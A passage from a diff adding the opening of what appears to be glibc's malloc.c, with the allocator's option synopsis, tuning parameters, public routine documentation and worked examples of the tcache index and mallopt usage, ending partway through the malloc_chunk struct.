+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification,
+       also with SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
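+
+/* Worked example of the index math above, assuming USE_TCACHE is enabled on
+   a 64-bit target where MALLOC_ALIGNMENT == 16, MINSIZE == 32 and
+   SIZE_SZ == 8 (the 32-bit values differ):
+
+     tidx2usize (0)    == 0 * 16 + 32 - 8        == 24
+     tidx2usize (1)    == 1 * 16 + 32 - 8        == 40
+     csize2tidx (0x20) == (0x20 - 32 + 15) / 16  == 0
+     csize2tidx (0x30) == (0x30 - 32 + 15) / 16  == 1
+
+   which matches the "idx 0  bytes 0..24, idx 1  bytes 25..40" table above.  */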
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will,
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
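+
+/* A small usage sketch of the interface described above (the M_* constants
+   come from <malloc.h>; each call returns 1 on success and 0 on failure):
+
+     mallopt (M_MXFAST, 0);                    disable fastbins entirely
+     mallopt (M_TRIM_THRESHOLD, 256 * 1024);   keep at most 256K of slack
+     mallopt (M_MMAP_MAX, 0);                  never service requests via mmap
+
+   Several of these can also be set without code changes through the
+   MALLOC_TRIM_THRESHOLD_, MALLOC_MMAP_THRESHOLD_, MALLOC_MMAP_MAX_ and
+   MALLOC_TOP_PAD_ environment variables.  */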
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
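+
+/* Usage sketch: a long-lived process that has just released a large working
+   set can ask for trailing free memory to be returned to the system while
+   keeping, say, 1MB of headroom for upcoming allocations:
+
+     if (malloc_trim (1024 * 1024) == 0)
+       ;  nothing could be released (or negative sbrks are unsupported)
+
+   Passing a pad of 0 trims as much as possible.  */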
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
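+
+/* Worked example: with 4-byte size_t, DEFAULT_MXFAST is 64 * 4 / 4 == 64;
+   with 8-byte size_t it is 64 * 8 / 4 == 128, matching the "64 (for 32bit),
+   128 (for 64bit)" entry in the option synopsis above.  Note that M_MXFAST
+   is expressed in request-size units, not chunk-size units.  */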
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than the page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; when handing out mmapped pages the kernel simply
+  has no choice but to zero them.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64-bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
